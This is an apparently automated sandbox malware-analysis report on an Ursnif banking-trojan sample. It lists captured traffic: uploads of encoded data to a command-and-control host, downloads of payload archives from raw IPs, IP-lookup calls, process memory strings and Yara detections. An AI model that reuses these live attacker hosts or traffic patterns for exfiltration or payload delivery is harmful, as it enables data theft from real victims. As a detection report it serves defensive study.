                      Source: global trafficHTTP traffic detected: POST /images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=315998012542640097891134987170User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atContent-Length: 387Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 34 43 32 2e 62 69 6e 22 0d 0a 0d 0a c4 3a 05 dc 08 18 e8 11 ed cf a4 0c ab c1 02 66 7d 8c 42 f8 e1 54 84 bf 45 eb 69 35 db 71 df 5a 7f 36 2e 39 a9 d4 bc 44 3f a5 2d 4f e4 77 6d 4d e9 fd cb 9f 34 d3 52 90 c7 ef 96 8b 3a 51 52 33 1e 4e d7 58 12 20 f0 a1 ba 72 e2 a4 65 f4 9c 4a ba eb 0d a4 54 4a 8d a0 e6 5c df 1a 39 1e 99 48 4e bf 06 66 06 d2 5a c9 d5 25 ba ab df 3a 46 79 a9 9f 83 41 05 5b 19 68 e6 69 3c fa 64 22 5f d7 f5 51 fa 1a 19 70 83 6d 10 60 e4 02 29 a5 fe f7 70 0e ed 73 f8 c2 02 d4 cc d9 86 fb 43 90 cd b5 d4 4d 65 6e f2 f6 86 52 19 54 55 bf bc d5 03 6f 02 d5 2c db 53 12 f0 55 f2 6b bf 87 b2 cc aa 53 11 20 16 69 ac 25 cc fe 66 c8 96 93 c4 85 7f df 36 8f ff e7 40 65 fe 99 ce cc 93 52 c1 0b 35 49 c7 bb e4 4a 3a 27 ce 10 6b ec c7 39 84 5a 65 f9 0d 0a 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 2d 2d 0d 0a Data Ascii: --315998012542640097891134987170Content-Disposition: form-data; name="upload_file"; filename="84C2.bin":f}BTEi5qZ6.9D?-OwmM4R:QR3NX reJTJ\9HNfZ%:FyA[hi<d"_Qpm`)psCMenRTUo,SUkS i%f6@eR5IJ:'k9Ze--315998012542640097891134987170--
                      Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                      Source: Joe Sandbox ViewASN Name: CJNET-ASCheiljedangCoIncKR CJNET-ASCheiljedangCoIncKR
                      Source: Joe Sandbox ViewIP Address: 116.121.62.237 116.121.62.237
                      Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000014.00000003.458378624.0000012326C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.osofts/Microt0
                      Source: RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://curlmyip.net
                      Source: RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cmg
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.ux
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobp/
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.micro/1
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000014.00000002.472249997.000001230E871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://twitter.com/spotify
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: RuntimeBroker.exe, 0000002D.00000002.779649889.000001FFC2120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknownDNS traffic detected: queries for: resolver1.opendns.com
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D1CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                      Source: global trafficHTTP traffic detected: GET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: RuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: n Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                      Source: unknownHTTP traffic detected: POST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=318247997342640097891112487322User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atContent-Length: 563Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
